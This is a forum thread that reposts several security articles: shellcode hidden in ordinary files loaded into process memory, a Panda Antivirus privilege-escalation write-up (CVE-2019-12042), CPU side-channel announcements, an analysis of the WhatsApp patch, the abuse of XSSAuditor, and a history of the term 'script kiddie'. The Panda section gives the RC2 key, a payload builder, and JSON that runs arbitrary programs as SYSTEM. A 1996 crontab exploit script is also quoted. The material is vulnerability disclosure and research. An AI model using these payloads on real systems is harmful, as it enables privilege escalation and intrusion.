What about a corporate wallpaper that could be slightly modified and include a small shell-code that would be always loaded to memory after logon (some consideration for bitmap storage format in memory is needed for this case, but it’s trivial given the number of device context- and bitmap-related functions offered by GDI). Then we have address books for various programs, templates, databases (e.g. SQLITE3 in so many applications), backup files, icons, cursors, pictures, animations, and so on and so forth. If any of these can be loaded to memory by default, it is a possible place to inject whatever we want. Then there are trivial cases: for example Notepad loading a binary file into its window won’t make sense as we will see the corrupted garbage, but we only care about what’s in memory, not what’s displayed on GUI; if the binary resides in memory for a while, then it could be used as a data/code storage (i.e. shellcode could be loaded into Notepad memory directly via command line argument, from a file; also, as mentioned above the shellcode could appear as a typical English text so there is no issues with encoding/code mapping). This can go and on… Many of these leave a lot of forensic traces in memory, of course, but I believe they will become harder and harder to pinpoint using traditional DFIR methods. The truth is that data sharing (read: injection) is actually a BIG part of native Windows architecture. While I focused on trivial cases, let’s not forget about many others to which I already alluded earlier: shared memory sections, pipes, sockets, IOCTLs accepting incorrect buffers, and many other interprocess communication methods – they all will sooner or later be abused one way or another. Living Off the land. Bring Your Own Vulnerability. Bring Your Own Lolbin. Blend in. IMHO abusing the Native Architecture and signed executables and drivers is going to be something we will see more on regular basis. 
As usual, seasoned vulnerability researchers and companies focused on finding escalation-of-privilege and local/remote code execution bugs have been paving this road for many years, but it’s only now gaining momentum… So, yes… IMHO from a defense perspective it’s a battle already lost. Let’s hope AVs and EDRs will focus more on plain-vanilla data injection trickery soon… Or we all succumb to a completely new Windows paradigm — apps. No more hacking, no more reversing, just a controlled, sandboxed, “telemetrized” environment and… the end of some era… a better one than the one that follows… at least, IMHO Sursa: http://www.hexacorn.com/blog/2019/05/18/inserting-data-into-other-processes-address-space/
-
Tuesday, May 14, 2019 Panda Antivirus - Local Privilege Escalation (CVE-2019-12042) Hello, This blogpost is about a vulnerability that I found in Panda Antivirus that leads to privilege escalation from an unprivileged account to SYSTEM. The affected products are: versions < 18.07.03 of Panda Dome, Panda Internet Security, Panda Antivirus Pro, Panda Global Protection, Panda Gold Protection, and old versions of Panda Antivirus >= 15.0.4. The vulnerability was fixed in the latest version: 18.07.03. The Vulnerability: The vulnerable system service is AgentSvc.exe. This service creates a global section object and a corresponding global event that is signaled whenever a process that writes to the shared memory wants the data to be processed by the service. The vulnerability lies in the weak permissions that are assigned to both of these objects, allowing "Everyone", including unprivileged users, to manipulate the shared memory and the event. (Click to zoom) (Click to zoom) Reverse Engineering and Exploitation: The service creates a thread that waits indefinitely on the memory change event and parses the contents of the memory when the event is signaled. We'll briefly describe what the service expects the contents of the memory to be and how they're interpreted. When the second word from the start of the shared memory isn't zero, a call is made to the function shown below with a pointer to the address of the head of a list. (Click to zoom) The structure of a list element looks like this; we'll see shortly what that string should be representing:

typedef struct StdList_Event {
    struct StdList_Event* Next;
    struct StdList_Event* Previous;
    struct c_string {
        union {
            char* pStr;
            char str[16];
        };
        unsigned int Length;
        unsigned int InStructureStringMaxLen;
    } DispatcherEventString;
    //..
};

As shown below, the code expects a unicode string at offset 2 of the shared memory. It instantiates a "wstring" object with the string and converts the string to ANSI in a "string" object.
Moreover, a string is initialized on line 50 with "3sa342ZvSfB68aEq" and passed to the function "DecodeAndDecryptData" along with the attacker-controlled ANSI string and a pointer to an output string object. (Click to zoom) The function simply decodes the string from base64 and decrypts the result using RC2 with the key "3sa342ZvSfB68aEq". So whatever we supply in the shared memory must be RC2 encrypted and then base64 encoded. (Click to zoom) When returning from the above function, the decoded data is converted to a "wstring" (indicating the nature of the decrypted data). The do-while loop extracts the sub-strings delimited by '|' and inserts each one of them into the list that was passed in the arguments. (Click to zoom) When returning from this function, we're back at the thread's main function (code below) where the list is traversed and the strings are passed to the InsertEvent method of the CDispatcher class present in Dispatcher.dll. We'll see in a second what an event stands for in this context. (Click to zoom) In Dispatcher.dll we examine the CDispatcher::InsertEvent method and see that it inserts the event string into a CQueue queue. (Click to zoom) The queue elements are processed in the CDispatcher::Run method running in a separate thread, as shown in the disassembly below. (Click to zoom) The CRegisterPlugin::ProcessEvent method does the parsing of the attacker-controlled string; looking at the debug error messages, we find that we're dealing with an open-source JSON parser: https://github.com/udp/json-parser (Click to zoom) Now that we know what the service expects us to send as data, we need to know the JSON properties that we should supply. The method CDispatcher::Initialize calls an interesting method CRegisterPlugins::LoadAllPlugins that reads the path where Panda is installed from the registry, then accesses the "Plugins" folder and loads all the DLLs there.
A DLL that caught my attention immediately was Plugin_Commands.dll; it appears that it executes command-line commands. (Click to zoom) Since these DLLs have debugging error messages, they make locating methods pretty easy. It only takes a few seconds to find the Run method shown below in Plugin_Commands.dll. (Click to zoom) In this function we find the queried JSON properties from the input: (Click to zoom) It also didn't hurt to intercept some of these JSON messages from the kernel debugger (it took me a few minutes to intercept a command-line execute event). (Click to zoom) The ExeName field is present as we saw in the disassembly, a URL, and two MD5 hashes. By then, I was wondering if it was possible to execute something from disk, and which properties were mandatory and which were optional. Tracking the SourcePath property in the Run method's disassembly, we find a function that parses the value of this property and determines whether it points to a URL or to a file on disk. So it seems that it is possible to execute a file from disk by using the file:// URI. (Click to zoom) Looking for the mandatory properties, we find that we must supply at minimum these two: ExeName and SourcePath (as shown below). Fails (JZ fail) if the property ExeName is absent. Fails if the property SourcePath is absent. However, when we queue a "CmdLineExecute" event with only these two fields set, our process isn't created. While debugging this, I found that the "ExeMD5" property is also mandatory and it should contain a valid MD5 hash of the executable to run. The function CheckMD5Match dynamically calculates the file hash and compares it to the one we supply in the JSON property. (Click to zoom) And if successful, the execution flow takes us to "CreateProcessW".
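Putting the recovered requirements together, here is a hedged Python sketch of a builder for the plaintext event (helper names are mine; the RC2 + Base64 wrapping and the shared-memory write/event signaling steps are left out):

```python
import hashlib
import json
import os

def md5_of_file(path: str) -> str:
    # Mirror CheckMD5Match: the service hashes the file on disk itself,
    # so the hash we send must match the real executable.
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def build_cmdline_event(exe_dir: str, exe_name: str, parameters=None) -> str:
    # Mandatory JSON properties: ExeName, SourcePath (file:// URI) and ExeMD5.
    event = {
        "CmdLineExecute": {
            "ExeName": exe_name,
            "SourcePath": "file://" + exe_dir,
            "ExeMD5": md5_of_file(os.path.join(exe_dir, exe_name)),
        }
    }
    if parameters is not None:
        # Optional: used for the bypass where cmd.exe starts our binary.
        event["CmdLineExecute"]["Parameters"] = parameters
    return json.dumps(event)
```

The resulting string would still have to be RC2 encrypted with the "3sa342ZvSfB68aEq" key, base64 encoded, and written to the shared memory before signaling the event.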
(Click to zoom) Testing with the following JSON (RC2 + Base64 encoded) we see that we successfully executed cmd.exe as SYSTEM:

{
  "CmdLineExecute": {
    "ExeName": "cmd.exe",
    "SourcePath": "file://C:\\Windows\\System32",
    "ExeMD5": "fef8118edf7918d3c795d6ef03800519"
  }
}

(Click to zoom) However, when we try to supply an executable of our own, Panda will detect it as malware and delete it, even if the file is benign. There is a simple bypass for this in which we tell cmd.exe to start our process for us instead. The final JSON would look something like this:

{
  "CmdLineExecute": {
    "ExeName": "cmd.exe",
    "Parameters": "/c start C:\\Users\\VM\\Desktop\\run_me_as_system.exe",
    "SourcePath": "file://C:\\Windows\\System32",
    "ExeMD5": "fef8118edf7918d3c795d6ef03800519" //MD5 hash of CMD.EXE
  }
}

The final exploit drops a file from the resource section to disk, calculates the MD5 hash of cmd.exe present on the machine, builds the JSON, encrypts then encodes it, and finally writes the result to the shared memory prior to signaling the event. Also note that the exploit works without recompiling on all the affected products under all supported Windows versions. (Click to zoom) The exploit's source code is on my GitHub page; here is a link to the repository: https://github.com/SouhailHammou/Panda-Antivirus-LPE Thanks for reading and until another time Follow me on Twitter : here Posted by Souhail Hammou at 8:22 PM Sursa: https://rce4fun.blogspot.com/2019/05/panda-antivirus-local-privilege.html
-
Choosing a faculty focused on cybersecurity
Nytro replied to Oklah's topic in Discutii incepatori
Don't rely on university to learn security. There are some master's programs, but I don't know of anything at the bachelor's level. Do a computer science degree; it will help you learn a bit from several fields. Search the forum for posts about choosing a faculty. In the meantime, learn on your own, do CTFs; the Internet is full of resources (see the Tutoriale Engleza section here on the forum).- 1 reply
-
-
-
-
Hey folks, time for some good ol' fashioned investigation! Open Rights Group & Who Targets Me are monitoring European elections. GDPR breaches, privacy infringements, the works! They released a browser extension that records every political ad served to users on Facebook, including the data they used to target individuals. If you use Facebook, install the extension and browse your Facebook feed freely. If you aren't on Facebook, help us out by spreading the word. No additional personal information is recorded. If you have any concerns about this, ping me! We can pool all our questions and I'll send them an open letter, from the Security Espresso community. This information is via our good friends at Asociatia pentru Tehnologie si Internet. https://whotargets.me/en/ https://www.openrightsgroup.org/campaigns/who-targets-me-faq Via: https://www.facebook.com/secespresso/
-
Adventures in Video Conferencing - Natalie Silvanovich - INFILTRATE 2019 INFILTRATE 2020 will be held April 23/24, Miami Beach, Florida, infiltratecon.com
-
-
-
System Down: A systemd-journald Exploit Read the advisory Accompanying exploit: system-down.tar.gz Sursa: https://www.qualys.com/research/security-advisories/
-
-
-
RIDL and Fallout: MDS attacks Attacks on the newly-disclosed "MDS" hardware vulnerabilities in Intel CPUs The RIDL and Fallout speculative execution attacks allow attackers to leak confidential data across arbitrary security boundaries on a victim system, for instance compromising data held in the cloud or leaking your information to malicious websites. Our attacks leak data by exploiting the newly disclosed Microarchitectural Data Sampling (or MDS) side-channel vulnerabilities in Intel CPUs. Unlike existing attacks, our attacks can leak arbitrary in-flight data from CPU-internal buffers (Line Fill Buffers, Load Ports, Store Buffers), including data never stored in CPU caches. We show that existing defenses against speculative execution attacks are inadequate, and in some cases actually make things worse. Attackers can use our attacks to obtain sensitive data despite mitigations, due to vulnerabilities deep inside Intel CPUs. Sursa: https://mdsattacks.com/
-
ZombieLoad Attack Watch out! Your processor resurrects your private browsing-history and other sensitive data. After Meltdown, Spectre, and Foreshadow, we discovered more critical vulnerabilities in modern processors. The ZombieLoad attack allows stealing sensitive data and keys while the computer accesses them. While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs. These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys. The attack does not only work on personal computers but can also be exploited in the cloud. Make sure to get the latest updates for your operating system! Sursa: https://zombieloadattack.com/
-
The NSO WhatsApp Vulnerability – This is How It Happened May 14, 2019 Earlier today the Financial Times published that there is a critical vulnerability in the popular WhatsApp messaging application and that it is actively being used to inject spyware into victims' phones. According to the report, attackers only need to issue specially crafted VoIP calls to the victim in order to infect it, with no user interaction required for the attack to succeed. As WhatsApp is used by 1.5bn people worldwide, both on Android phones and iPhones, the messaging and voice application is known to be a popular target for hackers and governments alike. Immediately after the publication went live, Check Point Research began analyzing the details about the now-patched vulnerability, referred to as CVE-2019-3568. Here is the first technical analysis to explain how it happened. Technical Details Facebook’s advisory describes it as a “buffer overflow vulnerability” in the SRTCP protocol, so we started by patch-diffing the new WhatsApp version for Android (v2.19.134, 32-bit program) in search of a matching code fix. Soon enough we stumbled upon two code fixes in the SRTCP module: Size Check #1 The patched function is a major RTCP handler function, and the added fix can be found right at its start. The added check verifies the length argument against a maximal size of 1480 bytes (0x5C8). During our debugging session we confirmed that this is indeed a major function in the RTCP module and that it is called even before the WhatsApp voice call is answered. Size Check #2 In the flow between the two functions we can see that the same length variable is now used twice during the newly added sanitation checks (marked in blue): Validation that the packet’s length field doesn’t exceed the length. An additional check that the length is once again <= 1480, right before a memory copy.
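Modeled in Python (the function name and structure are mine, not WhatsApp's native code), the two added sanitation checks amount to something like this:

```python
MAX_RTCP_LEN = 1480  # 0x5C8, the cap introduced by the patch

def handle_rtcp(packet: bytes, claimed_len: int) -> bytes:
    # Size check #1: reject oversized input right at the start of the
    # major RTCP handler function.
    if len(packet) > MAX_RTCP_LEN:
        raise ValueError("RTCP packet larger than 1480 bytes")
    # Size check #2: the packet's internal length field must not exceed
    # the actual buffer, and is checked once again against 1480 right
    # before the memory copy.
    if claimed_len > len(packet) or claimed_len > MAX_RTCP_LEN:
        raise ValueError("sanitation check failed: possible overflow")
    return packet[:claimed_len]  # stands in for the now-bounded copy
```

Before the patch, a missing check of this kind would let an oversized length drive the copy past the end of the buffer.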
As one can see, the second check includes a newly added log string that specifically says it is a sanitation check to avoid a possible overflow. Conclusion WhatsApp implemented their own implementation of the complex SRTCP protocol, and it is implemented in native code, i.e. C/C++ and not Java. During our patch analysis of CVE-2019-3568, we found two newly added size checks that are explicitly described as sanitation checks against memory overflows when parsing and handling the network packets in memory. As the entire SRTCP module is pretty big, there could be additional patches that we’ve missed. In addition, judging by the nature of the fixed vulnerabilities and by the complexity of the mentioned module, there is also a probable chance that there are still additional unknown parsing vulnerabilities in this module. Sursa: https://research.checkpoint.com/the-nso-whatsapp-vulnerability-this-is-how-it-happened/
-
Adversarial Examples for Electrocardiograms Xintian Han, Yuxuan Hu, Luca Foschini, Larry Chinitz, Lior Jankelson, Rajesh Ranganath (Submitted on 13 May 2019) Among all physiological signals, electrocardiogram (ECG) has seen some of the largest expansion in both medical and recreational applications with the rise of single-lead versions. These versions are embedded in medical devices and wearable products such as the injectable Medtronic Linq monitor, the iRhythm Ziopatch wearable monitor, and the Apple Watch Series 4. Recently, deep neural networks have been used to classify ECGs, outperforming even physicians specialized in cardiac electrophysiology. However, deep learning classifiers have been shown to be brittle to adversarial examples, including in medical-related tasks. Yet, traditional attack methods such as projected gradient descent (PGD) create examples that introduce square wave artifacts that are not physiological. Here, we develop a method to construct smoothed adversarial examples. We chose to focus on models learned on the data from the 2017 PhysioNet/Computing-in-Cardiology Challenge for single lead ECG classification. For this model, we utilized a new technique to generate smoothed examples to produce signals that are 1) indistinguishable to cardiologists from the original examples 2) incorrectly classified by the neural network. Further, we show that adversarial examples are not rare. Deep neural networks that have achieved state-of-the-art performance fail to classify smoothed adversarial ECGs that look real to clinical experts. Subjects: Signal Processing (eess.SP); Cryptography and Security (cs.CR); Machine Learning (cs.LG); Machine Learning (stat.ML) Cite as: arXiv:1905.05163 [eess.SP] (or arXiv:1905.05163v1 [eess.SP] for this version) Submission history From: Xintian Han [view email] [v1] Mon, 13 May 2019 17:47:25 UTC (1,236 KB)
Sursa: https://arxiv.org/abs/1905.05163
-
Chrome switching the XSSAuditor to filter mode re-enables old attack Fri 10 May 2019 Recently, Google Chrome changed the default mode for their Cross-Site Scripting filter XSSAuditor from block to filter. This means that instead of blocking the page load completely, XSSAuditor will now continue rendering the page but modify the bits that have been detected as an XSS issue. In this blog post, I will argue that the filter mode is a dangerous approach by re-stating the arguments from the whitepaper titled X-Frame-Options: All about Clickjacking? that I co-authored with Mario Heiderich in 2013. After that, I will elaborate on XSSAuditor's other shortcomings and revisit the history of back-and-forth in its default settings. In the end, I hope to convince you that XSSAuditor's contribution is not just negligible but really negative and should therefore be removed completely. JavaScript à la Carte When you allow websites to frame you, you basically give them full permission to decide what part of JavaScript of your very own script can be executed and what cannot. That sounds crazy, right? So, let’s say you have three script blocks on your website. The website that frames you doesn’t mind two of them - but really hates the third one. Maybe a framebuster, maybe some other script relevant for security purposes. So the website that frames you just turns that one script block off - and leaves the other two intact. Now how does that work? Well, it’s easy. All the framing website is doing is using the browser’s XSS filter to selectively kill JavaScript on your page. This worked in IE some years ago but doesn’t anymore - but it still works perfectly fine in Chrome. Let’s have a look at an annotated code example. Here is the evil website, framing your website on example.com and sending something that looks like an attempt to XSS you! Only that you don’t have any XSS bugs.
The injection is fake - and resembles a part of the JavaScript that you actually use on your site: <iframe src="//example.com/index.php?code=%3Cscript%20src=%22/js/security-libraries.js%22%3E%3C/script%3E"></iframe> Now we have your website. The content of the code parameter above is part of your website anyway - no injection here, just a match between URL and site content: <!doctype html> <h1>HELLO</h1> <script src="/js/security-libraries.js"></script> <script> // assumes that the libraries are included </script> The effect is compelling. The load of the security libraries will be blocked by Chrome’s XSS Auditor, violating the assumption in the following script block, which will run as usual. Existing and Future Countermeasures So, as we see, defaulting to filter was a bad decision and it can be overridden with the X-XSS-Protection: 1; mode=block header. You could also disallow websites from putting you in an iframe with X-Frame-Options: DENY, but it still leaves an attack vector as your websites could be opened as a top-level window. (The Cross-Origin-Opener-Policy will help, but does not yet ship in any major browser). Surely, Chrome might fix that one bug and stop exposing onerror from internal error pages. But that's not enough. Other shortcomings of the XSSAuditor XSSAuditor has numerous problems in detecting XSS. In fact, there are so many that the Chrome Security Team does not treat bypasses as security bugs in Chromium. For example, the XSSAuditor scans parameters individually and thus allows for easy bypasses on pages that have multiple injection points, as an attacker can just split their payload in half. Furthermore, XSSAuditor is only relevant for reflected XSS vulnerabilities. It is completely useless for other XSS vulnerabilities like persistent XSS, Mutation XSS (mXSS) or DOM XSS. DOM XSS has become more prevalent with the rise of JavaScript libraries and frameworks such as jQuery or AngularJS.
In fact, a 2017 research paper about exploiting DOM XSS through so-called script gadgets discovered that XSSAuditor is easily bypassed in 13 out of 16 tested JS frameworks. History of XSSAuditor defaults Here's a rough timeline: 2010 - Paper "Regular expressions considered harmful in client-side XSS filters" published. Outlining design of the XSSAuditor, Chrome ships it with default to filter 2016 - Chrome switching to block due to the attacks with non-existing injections November 2018 - Chrome error pages can be observed in an iframe, due to the onerror event being triggered twice, which allows for cross-site leak attacks (https://github.com/xsleaks/xsleaks/wiki/Browser-Side-Channels#xss-filters). January 2019 (hitting Chrome stable in April 2019) - XSSAuditor switching back to filter Conclusion Taking all things into consideration, I'd highly suggest removing the XSSAuditor from Chrome completely. In fact, Microsoft announced they'd remove the XSS filter from Edge last year. Unfortunately, a suggestion to retire XSSAuditor initiated by the Google Security Team was eventually dismissed by the Chrome Security Team. This blog post does not represent the position of my employer. Thanks to Mario Heiderich for providing valuable feedback: Supporting arguments and useful links are his. Mistakes are all mine.
Sursa: https://frederik-braun.com/xssauditor-bad.html
-
-
-
AntiFuzz: Impeding Fuzzing Audits of Binary Executables Authors: Emre Güler, Cornelius Aschermann, Ali Abbasi, and Thorsten Holz, Ruhr-Universität Bochum Abstract: A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile. Open Access Media USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. 
Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access. Sursa: https://www.usenix.org/conference/usenixsecurity19/presentation/guler
-
The Origin of Script Kiddie - Hacker Etymology 12 May 2019 Blog TL;DR The term script kiddie probably originated around 1994, but the first public record is from 1996. watch on YouTube Introduction In my early videos I used the slogan "don’t be a script kiddie" in the intro. And quite some time ago I got the following YouTube comment about it: Is "don’t be a script kiddie" a reference to Mr. Robot? Or is it already a thing in general? I think it would be interesting to look for the origin of the term script kiddie, and at the same time it gives us an excuse to look into the past, to better understand what our community is built upon and somewhat honour and remember it. I wish I was old enough to have experienced that time myself to tell you first-hand stories, but unfortunately I was born in the early 90s and so I’m merely an observer and explorer of the publicly available historical records. But there is fascinating stuff out there that I want to share with you. Phrack The first resource I wanted to check is Phrack. Phrack is probably the longest running ezine, as it was started in 1985 by Taran King and Knight Lightning. source: http://www.erik.co.uk/hackerpix/ I highly encourage you to just randomly click around through those old issues and read some random articles. You will find stuff about operating systems and various technologies you might have never heard about - because they don’t exist anymore. But you also find traces of the humans behind all this through the Phrack Pro-Philes and other articles. Maybe check out the famous hacker manifesto from 1986 - The Conscience of a Hacker. It was written by a teenager, calling himself The Mentor, who probably never thought that his rage-induced philosophical writing would go on to influence a whole generation of hackers. But it becomes even more fascinating with the privilege of being here in the future, right now, and looking back.
I found this talk from 2002 by The Mentor and he is now a grown man reflecting on his experience about this. It’s emotional and human. And in the end this is what the hacker culture is. It’s full of humans with complex emotions, we shouldn't forget that. Watch on YouTube Anyway, I’m getting really distracted here. Back to script kiddie research. The oldest occurrence of script kiddie we can find is from issue 54, released in 1998, articles 9 and 11. [...] when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. And the other is a sarcastic comment about rootshell.com being hacked and them handing over data to law enforcement: Lets give out scripts that help every clueless script kiddie break into thousands of sites worldwide. then narc off the one that breaks into us. So this issue is from 1998, which is already the 90s, but I’m sure there have to be earlier occurrences. Wikipedia is often pretty good with information and references, but unfortunately there are only links going back to the 2000s. Yet Another Bulletin Board System Then I looked at the textfiles.com archive, which is run by Jason Scott. This is a huuuge archive of old zines, bulletin boards, mailing lists, and more. And so I started to search through that and indeed I found some interesting traces from around 1993/1994 in a BBS called yabbs - yet another bulletin board system created by Alex Wetmore in 1991 at Carnegie Mellon. The first interesting find is from October 1993: Enjoy your K-Rad elite kodez kiddies Here the term kiddie is not prefixed with script, and I’m not sure if it’s “elite code, kiddies” or elite "code kiddies”. But code and script are almost synonymous and it seems to be used in a very similar derogatory way as the modern terminology.
Then in June 1994 there is this message: Codez kiddies just don’t seem to understand that those scripts had to come from somwhere. Hacking has fizzled down to kids running scripts to show off at a 2600 meet. We have again a reference to “codez kiddies” but now the term script also starts to appear in the same sentence. And then in July 1994 it got combined to: Even 99% of the wanker script codez kiddies knows enough to not run scripts on the Department of Defense. Isn’t this fascinating! I believe that 1994 is the year where the term script kiddie started to appear. But this example is still not 100% the modern term... The First Script Kiddie The earliest usage of literally script kiddie that I was able to find is in an exploit from 1996. [r00t.1] [crongrab] [public release] Crontab has a bug. You run crontab -e, then you goto a shell, relink the temp fire that crontab is having you edit, and presto, it is now your property. This bug has been confirmed on various versions of OSF/1, Digital UNIX 3.x, and AIX 3.x If, while running my script, you somehow manage to mangle up your whole system, or perhaps do something stupid that will place you in jail, then neither I, nor sirsyko, nor the other fine folks of r00t are responsible. Personally, I hope my script eats your cat and causes swarms of locuses to decend down upon you, but I am not responsible if they do. --kmem. [-- Script kiddies cut here -- ] #!/bin/sh # This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996 # This crappy exploit script was written by kmem. # and remember if ur not owned by r00t, ur not worth owning # # usage: crongrab echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others??? echo if this did not work on OSF/1 read the comments -- it is easy to fix.
if [ $# -ne '2' ]; then echo "usage: $0 " exit fi HI_MUDGE=$1 YUMMY=$2 export HI_MUDGE UNAME=`uname` GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1" #SETUP the awk script cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1 sed -f aix.sed .r00t-tmp1 > $YUMMY elif [ $UNAME = "OSF1" ]; then #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines crontab -e 2>.r00t-tmp1 awk -f 1.awk .r00t-tmp1 >$YUMMY # FOR PRE DIGITAL UNIX 3.X machines uncomment this line #crontab -l 2>&1 > $YUMMY else echo "Sorry, dont know your OS. But you are a bright boy, read the skript and" echo "Figger it out." exit fi echo "Checkit out - $YUMMY" echo "sirsyko and kmem kickin it out." echo "r00t" #cleanup our mess crontab -r VISUAL=$oldvis EDITOR=$oldedit HI_MUDGE='' YUMMY='' export HI_MUDGE export YUMMY export VISUAL export EDITOR rm -f $GIRLIES [-- Script kiddies cut here -- ] THERE IT IS! This bug was discovered by sirsyko on Thursday 21st Mar of 1996, just after midnight. I guess nothing has changed with hacking into the night. And this exploit script was written by kmem. You know what’s cool? With a bit of digging I actually found party pictures from around 1996/97 from kmem and sirsyko. I’m so grateful that there was some record keeping through pictures from that time, which takes away some of the mysticism that surrounds those early hackers - they look like normal dudes! But anyway, is this really the first time that somebody used the term script kiddie? Is this where it all started? Well… When I was asking around, somebody reminded me of Cunningham's Law the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer. so... I DECLARE THIS EXPLOIT TO BE THE FIRST USAGE OF THE TERM SCRIPT KIDDIE! IT’S. A. FACT! Epilogue I’m aware that a lot of the hacking culture happened in private boards, forums and chat rooms. But maybe somebody out there has old (non-)public IRC logs and can grep over it for us. 
I think it would be really cool to find more traces about the evolution of this term. Also I would LOVE to hear the story behind any exploit from the 90s. How did you find it, did you share it, how did you learn what you knew, what kind of research did you do yourself, who was influential to you, did anybody steal your bug, were there bug collisions, what was it like to experience a buffer overflow for the first time, etc. I think there are a lot of fascinating stories hidden behind those zines and exploits from that time and they haven’t been told yet. I don’t want them to be forgotten - please share your story. Update I was just sent this talk by Alex Ivanov and @JohnDunlap2 from HOPE 2018. They saw my tweet from 2018 about the exploit in 1996, but they go even further! A lot of info about k-rad, the first 1337 speak, etc. LiveOverflow wannabe hacker... Sursa: https://liveoverflow.com/the-origin-of-script-kiddie-hacker-etymology/